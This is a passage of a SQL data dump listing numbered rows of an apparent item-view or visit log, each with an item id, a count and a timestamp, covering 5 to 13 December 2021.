21:41:03'),(39604,2309,1,'2021-12-05','2021-12-05 22:05:31'),(39605,2309,1,'2021-12-05','2021-12-05 22:14:22'),(39606,2457,1,'2021-12-05','2021-12-05 22:22:51'),(39607,2156,1,'2021-12-05','2021-12-05 22:27:16'),(39608,2309,1,'2021-12-05','2021-12-05 23:51:02'),(39609,3316,1,'2021-12-06','2021-12-06 00:41:09'),(39610,1602,1,'2021-12-06','2021-12-06 00:48:45'),(39611,469,1,'2021-12-06','2021-12-06 01:06:25'),(39612,1872,1,'2021-12-06','2021-12-06 02:05:54'),(39613,80,1,'2021-12-06','2021-12-06 02:50:17'),(39614,4335,1,'2021-12-06','2021-12-06 03:11:33'),(39615,2991,1,'2021-12-06','2021-12-06 03:30:31'),(39616,3498,1,'2021-12-06','2021-12-06 06:10:35'),(39617,4440,1,'2021-12-06','2021-12-06 06:28:43'),(39618,4492,1,'2021-12-06','2021-12-06 06:46:43'),(39619,1586,1,'2021-12-06','2021-12-06 06:51:37'),(39620,2809,1,'2021-12-06','2021-12-06 07:03:37'),(39621,1586,1,'2021-12-06','2021-12-06 07:12:47'),(39622,2159,1,'2021-12-06','2021-12-06 07:47:17'),(39623,4335,1,'2021-12-06','2021-12-06 08:34:03'),(39624,1604,1,'2021-12-06','2021-12-06 09:08:40'),(39625,1614,1,'2021-12-06','2021-12-06 09:43:06'),(39626,1730,1,'2021-12-06','2021-12-06 09:43:07'),(39627,4492,1,'2021-12-06','2021-12-06 10:29:51'),(39628,68,1,'2021-12-06','2021-12-06 10:41:12'),(39629,1588,1,'2021-12-06','2021-12-06 10:54:15'),(39630,76,1,'2021-12-06','2021-12-06 12:19:57'),(39631,68,1,'2021-12-06','2021-12-06 12:20:15'),(39632,91,1,'2021-12-06','2021-12-06 12:20:57'),(39633,1582,1,'2021-12-06','2021-12-06 13:23:44'),(39634,1596,1,'2021-12-06','2021-12-06 14:44:13'),(39635,2775,1,'2021-12-06','2021-12-06 14:51:13'),(39636,91,1,'2021-12-06','2021-12-06 15:13:47'),(39637,4444,1,'2021-12-06','2021-12-06 15:14:37'),(39638,4448,1,'2021-12-06','2021-12-06 15:19:40'),(39639,4448,1,'2021-12-06','2021-12-06 15:19:41'),(39640,72,1,'2021-12-06','2021-12-06 15:19:45'),(39641,91,1,'2021-12-06','2021-12-06 15:20:23'),(39642,4440,1,'2021-12-06','2021-12-06 15:20:36'),(39643,4440,1,'2021-12-06','2021-12-06 15:20:38'),(39644,91,1,'2021-12-06','2021-12-06 15:20:54'),(39645,4412,1,'2021-12-06','2021-12-06 15:21:21'),(39646,4396,1,'2021-12-06','2021-12-06 15:22:07'),(39647,4391,1,'2021-12-06','2021-12-06 15:22:31'),(39648,4382,1,'2021-12-06','2021-12-06 15:23:47'),(39649,4368,1,'2021-12-06','2021-12-06 15:24:14'),(39650,4377,1,'2021-12-06','2021-12-06 15:24:31'),(39651,2309,1,'2021-12-06','2021-12-06 15:24:53'),(39652,2309,1,'2021-12-06','2021-12-06 15:25:00'),(39653,4357,1,'2021-12-06','2021-12-06 15:25:32'),(39654,4489,1,'2021-12-06','2021-12-06 15:25:50'),(39655,91,1,'2021-12-06','2021-12-06 15:25:53'),(39656,3267,1,'2021-12-06','2021-12-06 15:27:01'),(39657,3267,1,'2021-12-06','2021-12-06 15:27:06'),(39658,91,1,'2021-12-06','2021-12-06 15:28:28'),(39659,3275,1,'2021-12-06','2021-12-06 15:29:00'),(39660,91,1,'2021-12-06','2021-12-06 15:29:20'),(39661,3269,1,'2021-12-06','2021-12-06 15:29:54'),(39662,3269,1,'2021-12-06','2021-12-06 15:30:04'),(39663,3269,1,'2021-12-06','2021-12-06 15:30:20'),(39664,91,1,'2021-12-06','2021-12-06 15:30:23'),(39665,3271,1,'2021-12-06','2021-12-06 15:30:50'),(39666,2159,1,'2021-12-06','2021-12-06 15:30:51'),(39667,2159,1,'2021-12-06','2021-12-06 15:30:53'),(39668,2159,1,'2021-12-06','2021-12-06 15:30:53'),(39669,91,1,'2021-12-06','2021-12-06 15:31:21'),(39670,3273,1,'2021-12-06','2021-12-06 15:31:42'),(39671,3273,1,'2021-12-06','2021-12-06 15:31:47'),(39672,3273,1,'2021-12-06','2021-12-06 15:33:06'),(39673,91,1,'2021-12-06','2021-12-06 15:33:12'),(39674,3247,1,'2021-12-06','2021-12-06 15:33:34'),(39675,3247,1,'2021-12-06','2021-12-06 15:33:39'),(39676,91,1,'2021-12-06','2021-12-06 15:33:51'),(39677,2658,1,'2021-12-06','2021-12-06 15:34:08'),(39678,2658,1,'2021-12-06','2021-12-06 15:34:12'),(39679,91,1,'2021-12-06','2021-12-06 15:34:20'),(39680,2165,1,'2021-12-06','2021-12-06 15:34:59'),(39681,91,1,'2021-12-06','2021-12-06 15:35:11'),(39682,2156,1,'2021-12-06','2021-12-06 15:35:50'),(39683,2156,1,'2021-12-06','2021-12-06 15:35:55'),(39684,91,1,'2021-12-06','2021-12-06 15:36:00'),(39685,1768,1,'2021-12-06','2021-12-06 16:37:13'),(39686,1768,1,'2021-12-06','2021-12-06 16:38:55'),(39687,1768,1,'2021-12-06','2021-12-06 16:42:04'),(39688,1726,1,'2021-12-06','2021-12-06 17:14:44'),(39689,1600,1,'2021-12-06','2021-12-06 17:56:37'),(39690,2503,1,'2021-12-06','2021-12-06 17:57:06'),(39691,4341,1,'2021-12-06','2021-12-06 17:57:28'),(39692,1870,1,'2021-12-06','2021-12-06 17:59:03'),(39693,76,1,'2021-12-06','2021-12-06 17:59:31'),(39694,89,1,'2021-12-06','2021-12-06 18:00:05'),(39695,1768,1,'2021-12-06','2021-12-06 18:01:54'),(39696,1582,1,'2021-12-06','2021-12-06 18:02:25'),(39697,1582,1,'2021-12-06','2021-12-06 18:02:46'),(39698,89,1,'2021-12-06','2021-12-06 18:02:48'),(39699,76,1,'2021-12-06','2021-12-06 18:02:53'),(39700,1870,1,'2021-12-06','2021-12-06 18:02:57'),(39701,4341,1,'2021-12-06','2021-12-06 18:03:00'),(39702,2503,1,'2021-12-06','2021-12-06 18:03:06'),(39703,1600,1,'2021-12-06','2021-12-06 18:03:08'),(39704,2309,1,'2021-12-06','2021-12-06 19:08:20'),(39705,2769,1,'2021-12-06','2021-12-06 19:21:10'),(39706,1582,1,'2021-12-06','2021-12-06 19:31:39'),(39707,4238,1,'2021-12-06','2021-12-06 20:10:02'),(39708,72,1,'2021-12-06','2021-12-06 20:37:07'),(39709,72,1,'2021-12-06','2021-12-06 20:58:31'),(39710,2309,1,'2021-12-06','2021-12-06 21:52:01'),(39711,2904,1,'2021-12-06','2021-12-06 22:04:09'),(39712,2704,1,'2021-12-06','2021-12-06 22:49:56'),(39713,1602,1,'2021-12-06','2021-12-06 23:26:39'),(39714,3030,1,'2021-12-07','2021-12-07 00:00:26'),(39715,91,1,'2021-12-07','2021-12-07 00:05:18'),(39716,467,1,'2021-12-07','2021-12-07 01:33:59'),(39717,1598,1,'2021-12-07','2021-12-07 02:22:24'),(39718,80,1,'2021-12-07','2021-12-07 02:26:32'),(39719,80,1,'2021-12-07','2021-12-07 02:28:34'),(39720,1602,1,'2021-12-07','2021-12-07 02:38:20'),(39721,89,1,'2021-12-07','2021-12-07 02:42:24'),(39722,89,1,'2021-12-07','2021-12-07 02:43:38'),(39723,91,1,'2021-12-07','2021-12-07 02:45:29'),(39724,87,1,'2021-12-07','2021-12-07 02:46:38'),(39725,84,1,'2021-12-07','2021-12-07 02:48:15'),(39726,84,1,'2021-12-07','2021-12-07 02:55:13'),(39727,87,1,'2021-12-07','2021-12-07 02:55:15'),(39728,91,1,'2021-12-07','2021-12-07 02:55:16'),(39729,89,1,'2021-12-07','2021-12-07 02:55:19'),(39730,89,1,'2021-12-07','2021-12-07 02:55:20'),(39731,1612,1,'2021-12-07','2021-12-07 03:43:07'),(39732,1612,1,'2021-12-07','2021-12-07 03:43:22'),(39733,2297,1,'2021-12-07','2021-12-07 03:43:49'),(39734,2769,1,'2021-12-07','2021-12-07 04:10:11'),(39735,3675,1,'2021-12-07','2021-12-07 04:10:44'),(39736,3127,1,'2021-12-07','2021-12-07 04:15:12'),(39737,4301,1,'2021-12-07','2021-12-07 04:19:03'),(39738,3285,1,'2021-12-07','2021-12-07 04:42:24'),(39739,2704,1,'2021-12-07','2021-12-07 05:11:17'),(39740,2165,1,'2021-12-07','2021-12-07 05:15:31'),(39741,72,1,'2021-12-07','2021-12-07 05:34:30'),(39742,2775,1,'2021-12-07','2021-12-07 05:34:43'),(39743,91,1,'2021-12-07','2021-12-07 05:35:01'),(39744,3058,1,'2021-12-07','2021-12-07 05:35:10'),(39745,4344,1,'2021-12-07','2021-12-07 05:35:53'),(39746,3721,1,'2021-12-07','2021-12-07 05:37:22'),(39747,477,1,'2021-12-07','2021-12-07 06:08:12'),(39748,3278,1,'2021-12-07','2021-12-07 06:27:23'),(39749,3764,1,'2021-12-07','2021-12-07 06:54:57'),(39750,2309,1,'2021-12-07','2021-12-07 09:24:09'),(39751,2309,1,'2021-12-07','2021-12-07 09:28:23'),(39752,1594,1,'2021-12-07','2021-12-07 10:02:44'),(39753,1594,1,'2021-12-07','2021-12-07 10:02:53'),(39754,1699,1,'2021-12-07','2021-12-07 10:07:24'),(39755,1614,1,'2021-12-07','2021-12-07 10:24:23'),(39756,2309,1,'2021-12-07','2021-12-07 10:36:56'),(39757,4436,1,'2021-12-07','2021-12-07 10:53:37'),(39758,4436,1,'2021-12-07','2021-12-07 10:53:39'),(39759,1602,1,'2021-12-07','2021-12-07 11:14:12'),(39760,1720,1,'2021-12-07','2021-12-07 11:40:20'),(39761,4400,1,'2021-12-07','2021-12-07 11:42:44'),(39762,1596,1,'2021-12-07','2021-12-07 11:45:00'),(39763,1596,1,'2021-12-07','2021-12-07 11:48:47'),(39764,2297,1,'2021-12-07','2021-12-07 12:33:15'),(39765,1776,1,'2021-12-07','2021-12-07 12:33:18'),(39766,2658,1,'2021-12-07','2021-12-07 13:08:28'),(39767,87,1,'2021-12-07','2021-12-07 13:10:56'),(39768,87,1,'2021-12-07','2021-12-07 13:11:37'),(39769,2154,1,'2021-12-07','2021-12-07 13:18:18'),(39770,1594,1,'2021-12-07','2021-12-07 13:18:19'),(39771,1778,1,'2021-12-07','2021-12-07 13:18:23'),(39772,68,1,'2021-12-07','2021-12-07 13:39:26'),(39773,68,1,'2021-12-07','2021-12-07 14:22:25'),(39774,570,1,'2021-12-07','2021-12-07 14:43:18'),(39775,1582,1,'2021-12-07','2021-12-07 14:44:32'),(39776,1728,1,'2021-12-07','2021-12-07 14:49:57'),(39777,1728,1,'2021-12-07','2021-12-07 14:50:08'),(39778,4238,1,'2021-12-07','2021-12-07 14:51:48'),(39779,2704,1,'2021-12-07','2021-12-07 15:01:18'),(39780,68,1,'2021-12-07','2021-12-07 15:12:41'),(39781,68,1,'2021-12-07','2021-12-07 15:13:29'),(39782,68,1,'2021-12-07','2021-12-07 15:13:48'),(39783,76,1,'2021-12-07','2021-12-07 15:14:24'),(39784,68,1,'2021-12-07','2021-12-07 15:15:56'),(39785,76,1,'2021-12-07','2021-12-07 15:16:27'),(39786,1582,1,'2021-12-07','2021-12-07 15:16:33'),(39787,1594,1,'2021-12-07','2021-12-07 15:17:35'),(39788,2309,1,'2021-12-07','2021-12-07 15:32:08'),(39789,1586,1,'2021-12-07','2021-12-07 16:09:10'),(39790,1703,1,'2021-12-07','2021-12-07 16:25:35'),(39791,2309,1,'2021-12-07','2021-12-07 16:27:17'),(39792,478,1,'2021-12-07','2021-12-07 16:39:34'),(39793,2309,1,'2021-12-07','2021-12-07 16:47:01'),(39794,2309,1,'2021-12-07','2021-12-07 17:21:07'),(39795,2309,1,'2021-12-07','2021-12-07 17:35:32'),(39796,2309,1,'2021-12-07','2021-12-07 17:39:04'),(39797,2309,1,'2021-12-07','2021-12-07 17:44:07'),(39798,3247,1,'2021-12-07','2021-12-07 17:58:48'),(39799,4457,1,'2021-12-07','2021-12-07 18:01:54'),(39800,2309,1,'2021-12-07','2021-12-07 18:08:42'),(39801,2309,1,'2021-12-07','2021-12-07 18:09:58'),(39802,2309,1,'2021-12-07','2021-12-07 18:18:38'),(39803,2309,1,'2021-12-07','2021-12-07 18:19:48'),(39804,2704,1,'2021-12-07','2021-12-07 18:33:05'),(39805,2801,1,'2021-12-07','2021-12-07 18:41:50'),(39806,2309,1,'2021-12-07','2021-12-07 18:47:07'),(39807,2309,1,'2021-12-07','2021-12-07 18:47:18'),(39808,2309,1,'2021-12-07','2021-12-07 18:47:24'),(39809,2704,1,'2021-12-07','2021-12-07 18:57:24'),(39810,3278,1,'2021-12-07','2021-12-07 19:15:20'),(39811,2309,1,'2021-12-07','2021-12-07 19:19:37'),(39812,2309,1,'2021-12-07','2021-12-07 19:20:23'),(39813,2309,1,'2021-12-07','2021-12-07 19:21:14'),(39814,2801,1,'2021-12-07','2021-12-07 19:33:17'),(39815,2309,1,'2021-12-07','2021-12-07 19:53:14'),(39816,2804,1,'2021-12-07','2021-12-07 20:00:12'),(39817,1544,1,'2021-12-07','2021-12-07 20:08:11'),(39818,2503,1,'2021-12-07','2021-12-07 20:25:37'),(39819,80,1,'2021-12-07','2021-12-07 21:21:25'),(39820,1776,1,'2021-12-07','2021-12-07 21:43:20'),(39821,2297,1,'2021-12-07','2021-12-07 21:43:23'),(39822,1594,1,'2021-12-07','2021-12-07 21:43:39'),(39823,1602,1,'2021-12-07','2021-12-07 21:44:32'),(39824,4377,1,'2021-12-07','2021-12-07 22:08:29'),(39825,4301,1,'2021-12-07','2021-12-07 22:30:24'),(39826,2309,1,'2021-12-07','2021-12-07 22:46:40'),(39827,3107,1,'2021-12-07','2021-12-07 23:03:29'),(39828,2904,1,'2021-12-07','2021-12-07 23:53:26'),(39829,2159,1,'2021-12-08','2021-12-08 00:15:57'),(39830,2159,1,'2021-12-08','2021-12-08 00:34:19'),(39831,2161,1,'2021-12-08','2021-12-08 01:48:14'),(39832,2161,1,'2021-12-08','2021-12-08 01:48:39'),(39833,2161,1,'2021-12-08','2021-12-08 01:48:48'),(39834,2161,1,'2021-12-08','2021-12-08 01:49:38'),(39835,2161,1,'2021-12-08','2021-12-08 01:54:05'),(39836,3752,1,'2021-12-08','2021-12-08 02:58:58'),(39837,2297,1,'2021-12-08','2021-12-08 03:37:43'),(39838,3752,1,'2021-12-08','2021-12-08 03:46:57'),(39839,3752,1,'2021-12-08','2021-12-08 03:50:20'),(39840,2309,1,'2021-12-08','2021-12-08 03:51:05'),(39841,3273,1,'2021-12-08','2021-12-08 04:28:27'),(39842,335,1,'2021-12-08','2021-12-08 05:06:48'),(39843,4432,1,'2021-12-08','2021-12-08 05:17:40'),(39844,570,1,'2021-12-08','2021-12-08 05:18:27'),(39845,570,1,'2021-12-08','2021-12-08 05:18:52'),(39846,2309,1,'2021-12-08','2021-12-08 05:21:21'),(39847,2309,1,'2021-12-08','2021-12-08 05:21:29'),(39848,2309,1,'2021-12-08','2021-12-08 05:23:13'),(39849,1594,1,'2021-12-08','2021-12-08 05:35:16'),(39850,2154,1,'2021-12-08','2021-12-08 06:03:48'),(39851,2558,1,'2021-12-08','2021-12-08 06:19:24'),(39852,2558,1,'2021-12-08','2021-12-08 06:27:18'),(39853,1776,1,'2021-12-08','2021-12-08 06:40:47'),(39854,2159,1,'2021-12-08','2021-12-08 06:55:53'),(39855,2159,1,'2021-12-08','2021-12-08 06:55:55'),(39856,2159,1,'2021-12-08','2021-12-08 06:55:58'),(39857,2159,1,'2021-12-08','2021-12-08 06:57:39'),(39858,72,1,'2021-12-08','2021-12-08 07:27:21'),(39859,72,1,'2021-12-08','2021-12-08 07:38:04'),(39860,80,1,'2021-12-08','2021-12-08 07:57:09'),(39861,1770,1,'2021-12-08','2021-12-08 08:06:52'),(39862,1770,1,'2021-12-08','2021-12-08 08:07:33'),(39863,3531,1,'2021-12-08','2021-12-08 10:44:45'),(39864,1606,1,'2021-12-08','2021-12-08 10:44:46'),(39865,72,1,'2021-12-08','2021-12-08 10:47:31'),(39866,2775,1,'2021-12-08','2021-12-08 10:47:45'),(39867,4400,1,'2021-12-08','2021-12-08 11:02:58'),(39868,4400,1,'2021-12-08','2021-12-08 11:04:08'),(39869,1544,1,'2021-12-08','2021-12-08 11:13:03'),(39870,3045,1,'2021-12-08','2021-12-08 11:30:03'),(39871,80,1,'2021-12-08','2021-12-08 11:30:20'),(39872,3226,1,'2021-12-08','2021-12-08 11:41:52'),(39873,72,1,'2021-12-08','2021-12-08 11:42:54'),(39874,1600,1,'2021-12-08','2021-12-08 11:50:09'),(39875,1602,1,'2021-12-08','2021-12-08 11:56:04'),(39876,1602,1,'2021-12-08','2021-12-08 12:00:32'),(39877,468,1,'2021-12-08','2021-12-08 12:04:27'),(39878,1600,1,'2021-12-08','2021-12-08 12:04:34'),(39879,2904,1,'2021-12-08','2021-12-08 12:07:06'),(39880,1594,1,'2021-12-08','2021-12-08 13:08:38'),(39881,76,1,'2021-12-08','2021-12-08 13:27:20'),(39882,1600,1,'2021-12-08','2021-12-08 13:32:07'),(39883,2658,1,'2021-12-08','2021-12-08 14:23:41'),(39884,1600,1,'2021-12-08','2021-12-08 14:39:20'),(39885,1604,1,'2021-12-08','2021-12-08 14:47:34'),(39886,3287,1,'2021-12-08','2021-12-08 14:56:54'),(39887,80,1,'2021-12-08','2021-12-08 15:23:34'),(39888,2248,1,'2021-12-08','2021-12-08 16:27:46'),(39889,4492,1,'2021-12-08','2021-12-08 17:00:59'),(39890,1582,1,'2021-12-08','2021-12-08 18:24:00'),(39891,72,1,'2021-12-08','2021-12-08 18:26:57'),(39892,3482,1,'2021-12-08','2021-12-08 18:45:04'),(39893,80,1,'2021-12-08','2021-12-08 19:00:10'),(39894,477,1,'2021-12-08','2021-12-08 20:46:51'),(39895,1614,1,'2021-12-08','2021-12-08 20:51:38'),(39896,2813,1,'2021-12-08','2021-12-08 21:02:06'),(39897,1600,1,'2021-12-08','2021-12-08 21:38:53'),(39898,2503,1,'2021-12-08','2021-12-08 21:50:36'),(39899,1606,1,'2021-12-08','2021-12-08 22:06:52'),(39900,1602,1,'2021-12-08','2021-12-08 22:54:53'),(39901,1600,1,'2021-12-08','2021-12-08 23:32:21'),(39902,1598,1,'2021-12-08','2021-12-08 23:51:43'),(39903,2503,1,'2021-12-09','2021-12-09 00:05:05'),(39904,1544,1,'2021-12-09','2021-12-09 00:06:03'),(39905,1544,1,'2021-12-09','2021-12-09 00:53:01'),(39906,1720,1,'2021-12-09','2021-12-09 01:14:00'),(39907,1544,1,'2021-12-09','2021-12-09 01:18:47'),(39908,476,1,'2021-12-09','2021-12-09 01:21:45'),(39909,1768,1,'2021-12-09','2021-12-09 01:29:15'),(39910,3072,1,'2021-12-09','2021-12-09 01:35:33'),(39911,3789,1,'2021-12-09','2021-12-09 01:36:09'),(39912,87,1,'2021-12-09','2021-12-09 01:36:23'),(39913,2063,1,'2021-12-09','2021-12-09 03:39:03'),(39914,1695,1,'2021-12-09','2021-12-09 04:01:23'),(39915,1870,1,'2021-12-09','2021-12-09 06:23:19'),(39916,1600,1,'2021-12-09','2021-12-09 06:47:36'),(39917,1600,1,'2021-12-09','2021-12-09 06:48:55'),(39918,4301,1,'2021-12-09','2021-12-09 07:03:00'),(39919,80,1,'2021-12-09','2021-12-09 07:17:28'),(39920,3280,1,'2021-12-09','2021-12-09 08:04:07'),(39921,1606,1,'2021-12-09','2021-12-09 08:08:33'),(39922,3691,1,'2021-12-09','2021-12-09 08:17:22'),(39923,4492,1,'2021-12-09','2021-12-09 08:56:45'),(39924,4492,1,'2021-12-09','2021-12-09 08:57:55'),(39925,4492,1,'2021-12-09','2021-12-09 08:58:39'),(39926,2309,1,'2021-12-09','2021-12-09 09:36:35'),(39927,1604,1,'2021-12-09','2021-12-09 10:00:36'),(39928,2813,1,'2021-12-09','2021-12-09 10:16:23'),(39929,4335,1,'2021-12-09','2021-12-09 10:56:06'),(39930,4335,1,'2021-12-09','2021-12-09 10:57:29'),(39931,1594,1,'2021-12-09','2021-12-09 10:57:36'),(39932,4335,1,'2021-12-09','2021-12-09 10:58:37'),(39933,1602,1,'2021-12-09','2021-12-09 11:16:20'),(39934,1713,1,'2021-12-09','2021-12-09 11:41:28'),(39935,76,1,'2021-12-09','2021-12-09 11:41:58'),(39936,87,1,'2021-12-09','2021-12-09 11:42:52'),(39937,1586,1,'2021-12-09','2021-12-09 11:46:17'),(39938,2309,1,'2021-12-09','2021-12-09 11:46:19'),(39939,2904,1,'2021-12-09','2021-12-09 12:31:08'),(39940,469,1,'2021-12-09','2021-12-09 12:46:17'),(39941,1614,1,'2021-12-09','2021-12-09 13:16:19'),(39942,1600,1,'2021-12-09','2021-12-09 13:29:18'),(39943,80,1,'2021-12-09','2021-12-09 13:29:49'),(39944,2161,1,'2021-12-09','2021-12-09 14:05:23'),(39945,3764,1,'2021-12-09','2021-12-09 14:45:36'),(39946,1544,1,'2021-12-09','2021-12-09 15:39:01'),(39947,4457,1,'2021-12-09','2021-12-09 16:26:18'),(39948,89,1,'2021-12-09','2021-12-09 17:30:05'),(39949,1586,1,'2021-12-09','2021-12-09 17:30:19'),(39950,2775,1,'2021-12-09','2021-12-09 17:35:56'),(39951,2503,1,'2021-12-09','2021-12-09 17:53:09'),(39952,1602,1,'2021-12-09','2021-12-09 18:40:51'),(39953,2503,1,'2021-12-09','2021-12-09 19:10:45'),(39954,2309,1,'2021-12-09','2021-12-09 20:17:41'),(39955,2309,1,'2021-12-09','2021-12-09 20:21:40'),(39956,3781,1,'2021-12-09','2021-12-09 21:39:12'),(39957,1774,1,'2021-12-09','2021-12-09 22:51:10'),(39958,4238,1,'2021-12-10','2021-12-10 01:23:41'),(39959,1598,1,'2021-12-10','2021-12-10 01:35:07'),(39960,72,1,'2021-12-10','2021-12-10 01:38:32'),(39961,335,1,'2021-12-10','2021-12-10 01:40:00'),(39962,1596,1,'2021-12-10','2021-12-10 01:40:16'),(39963,1588,1,'2021-12-10','2021-12-10 02:04:26'),(39964,2457,1,'2021-12-10','2021-12-10 02:48:17'),(39965,487,1,'2021-12-10','2021-12-10 03:44:30'),(39966,3774,1,'2021-12-10','2021-12-10 04:40:30'),(39967,469,1,'2021-12-10','2021-12-10 05:29:55'),(39968,3030,1,'2021-12-10','2021-12-10 07:30:23'),(39969,3673,1,'2021-12-10','2021-12-10 08:43:44'),(39970,1594,1,'2021-12-10','2021-12-10 08:56:39'),(39971,80,1,'2021-12-10','2021-12-10 08:56:47'),(39972,68,1,'2021-12-10','2021-12-10 08:58:02'),(39973,1602,1,'2021-12-10','2021-12-10 09:22:52'),(39974,2410,1,'2021-12-10','2021-12-10 09:34:15'),(39975,1594,1,'2021-12-10','2021-12-10 09:45:23'),(39976,1699,1,'2021-12-10','2021-12-10 10:48:20'),(39977,1602,1,'2021-12-10','2021-12-10 11:50:25'),(39978,4457,1,'2021-12-10','2021-12-10 13:09:03'),(39979,486,1,'2021-12-10','2021-12-10 13:34:53'),(39980,488,1,'2021-12-10','2021-12-10 14:14:27'),(39981,3273,1,'2021-12-10','2021-12-10 14:58:43'),(39982,2751,1,'2021-12-10','2021-12-10 15:41:05'),(39983,3781,1,'2021-12-10','2021-12-10 16:19:46'),(39984,1602,1,'2021-12-10','2021-12-10 17:03:40'),(39985,4457,1,'2021-12-10','2021-12-10 17:07:07'),(39986,1602,1,'2021-12-10','2021-12-10 17:07:08'),(39987,1544,1,'2021-12-10','2021-12-10 17:13:31'),(39988,1711,1,'2021-12-10','2021-12-10 18:11:57'),(39989,1602,1,'2021-12-10','2021-12-10 18:22:40'),(39990,1602,1,'2021-12-10','2021-12-10 18:32:41'),(39991,1592,1,'2021-12-10','2021-12-10 18:39:45'),(39992,4238,1,'2021-12-10','2021-12-10 18:53:59'),(39993,1600,1,'2021-12-10','2021-12-10 18:55:26'),(39994,3030,1,'2021-12-10','2021-12-10 19:10:40'),(39995,1870,1,'2021-12-10','2021-12-10 19:39:43'),(39996,1870,1,'2021-12-10','2021-12-10 19:40:31'),(39997,1582,1,'2021-12-10','2021-12-10 19:45:03'),(39998,1602,1,'2021-12-10','2021-12-10 19:47:54'),(39999,1724,1,'2021-12-10','2021-12-10 19:49:45'),(40000,2609,1,'2021-12-10','2021-12-10 20:21:49'),(40001,1711,1,'2021-12-10','2021-12-10 20:48:55'),(40002,3764,1,'2021-12-11','2021-12-11 00:17:15'),(40003,3710,1,'2021-12-11','2021-12-11 01:59:04'),(40004,1592,1,'2021-12-11','2021-12-11 03:29:25'),(40005,469,1,'2021-12-11','2021-12-11 05:44:44'),(40006,3789,1,'2021-12-11','2021-12-11 05:44:45'),(40007,1715,1,'2021-12-11','2021-12-11 05:51:03'),(40008,1588,1,'2021-12-11','2021-12-11 05:57:28'),(40009,470,1,'2021-12-11','2021-12-11 06:03:56'),(40010,1600,1,'2021-12-11','2021-12-11 08:09:33'),(40011,4377,1,'2021-12-11','2021-12-11 08:20:53'),(40012,3127,1,'2021-12-11','2021-12-11 08:43:23'),(40013,1870,1,'2021-12-11','2021-12-11 08:48:27'),(40014,1594,1,'2021-12-11','2021-12-11 09:07:43'),(40015,4420,1,'2021-12-11','2021-12-11 11:34:32'),(40016,4416,1,'2021-12-11','2021-12-11 11:34:44'),(40017,3104,1,'2021-12-11','2021-12-11 11:34:56'),(40018,3104,1,'2021-12-11','2021-12-11 11:36:49'),(40019,3107,1,'2021-12-11','2021-12-11 11:36:52'),(40020,3104,1,'2021-12-11','2021-12-11 11:38:59'),(40021,4420,1,'2021-12-11','2021-12-11 11:59:59'),(40022,4448,1,'2021-12-11','2021-12-11 12:01:20'),(40023,4391,1,'2021-12-11','2021-12-11 12:18:17'),(40024,1596,1,'2021-12-11','2021-12-11 12:18:53'),(40025,76,1,'2021-12-11','2021-12-11 12:20:53'),(40026,76,1,'2021-12-11','2021-12-11 12:35:41'),(40027,1724,1,'2021-12-11','2021-12-11 13:15:52'),(40028,1606,1,'2021-12-11','2021-12-11 14:39:44'),(40029,1606,1,'2021-12-11','2021-12-11 14:42:55'),(40030,1592,1,'2021-12-11','2021-12-11 14:51:43'),(40031,3764,1,'2021-12-11','2021-12-11 15:26:33'),(40032,4357,1,'2021-12-11','2021-12-11 16:09:02'),(40033,80,1,'2021-12-11','2021-12-11 16:44:33'),(40034,1588,1,'2021-12-11','2021-12-11 17:21:06'),(40035,3764,1,'2021-12-11','2021-12-11 17:36:32'),(40036,3127,1,'2021-12-11','2021-12-11 17:49:05'),(40037,2457,1,'2021-12-11','2021-12-11 17:51:04'),(40038,3030,1,'2021-12-11','2021-12-11 18:31:13'),(40039,4416,1,'2021-12-11','2021-12-11 18:32:11'),(40040,3104,1,'2021-12-11','2021-12-11 18:33:09'),(40041,3107,1,'2021-12-11','2021-12-11 18:33:22'),(40042,1870,1,'2021-12-11','2021-12-11 18:40:32'),(40043,76,1,'2021-12-11','2021-12-11 18:41:46'),(40044,1877,1,'2021-12-11','2021-12-11 18:47:17'),(40045,1600,1,'2021-12-11','2021-12-11 19:07:39'),(40046,3109,1,'2021-12-11','2021-12-11 21:59:12'),(40047,2309,1,'2021-12-11','2021-12-11 22:25:39'),(40048,472,1,'2021-12-11','2021-12-11 22:41:53'),(40049,1602,1,'2021-12-11','2021-12-11 23:42:27'),(40050,478,1,'2021-12-12','2021-12-12 00:28:28'),(40051,4391,1,'2021-12-12','2021-12-12 01:13:34'),(40052,1582,1,'2021-12-12','2021-12-12 05:44:30'),(40053,80,1,'2021-12-12','2021-12-12 06:04:39'),(40054,1594,1,'2021-12-12','2021-12-12 06:24:43'),(40055,1588,1,'2021-12-12','2021-12-12 07:04:58'),(40056,2410,1,'2021-12-12','2021-12-12 07:25:05'),(40057,2617,1,'2021-12-12','2021-12-12 07:54:48'),(40058,4444,1,'2021-12-12','2021-12-12 08:17:59'),(40059,2813,1,'2021-12-12','2021-12-12 08:46:50'),(40060,1602,1,'2021-12-12','2021-12-12 09:20:45'),(40061,2309,1,'2021-12-12','2021-12-12 09:30:25'),(40062,1711,1,'2021-12-12','2021-12-12 11:07:42'),(40063,3752,1,'2021-12-12','2021-12-12 11:30:06'),(40064,1602,1,'2021-12-12','2021-12-12 12:24:21'),(40065,1582,1,'2021-12-12','2021-12-12 13:33:22'),(40066,2309,1,'2021-12-12','2021-12-12 15:25:11'),(40067,2156,1,'2021-12-12','2021-12-12 18:19:34'),(40068,2159,1,'2021-12-12','2021-12-12 18:32:27'),(40069,1592,1,'2021-12-12','2021-12-12 18:44:00'),(40070,2813,1,'2021-12-12','2021-12-12 19:02:12'),(40071,469,1,'2021-12-12','2021-12-12 19:18:19'),(40072,1598,1,'2021-12-12','2021-12-12 19:42:14'),(40073,4396,1,'2021-12-12','2021-12-12 21:29:51'),(40074,4454,1,'2021-12-12','2021-12-12 21:34:39'),(40075,2704,1,'2021-12-12','2021-12-12 22:17:39'),(40076,2804,1,'2021-12-12','2021-12-12 22:19:51'),(40077,2804,1,'2021-12-12','2021-12-12 22:22:31'),(40078,1612,1,'2021-12-12','2021-12-12 22:46:40'),(40079,472,1,'2021-12-12','2021-12-12 23:24:12'),(40080,1766,1,'2021-12-13','2021-12-13 02:20:21'),(40081,3109,1,'2021-12-13','2021-12-13 03:32:51'),(40082,1594,1,'2021-12-13','2021-12-13 04:55:46'),(40083,1582,1,'2021-12-13','2021-12-13 05:37:14'),(40084,1709,1,'2021-12-13','2021-12-13 05:40:25'),(40085,1709,1,'2021-12-13','2021-12-13 05:41:57'),(40086,3063,1,'2021-12-13','2021-12-13 05:46:26'),(40087,1728,1,'2021-12-13','2021-12-13 06:00:54'),(40088,1728,1,'2021-12-13','2021-12-13 06:02:22'),(40089,1728,1,'2021-12-13','2021-12-13 06:02:33'),(40090,2457,1,'2021-12-13','2021-12-13 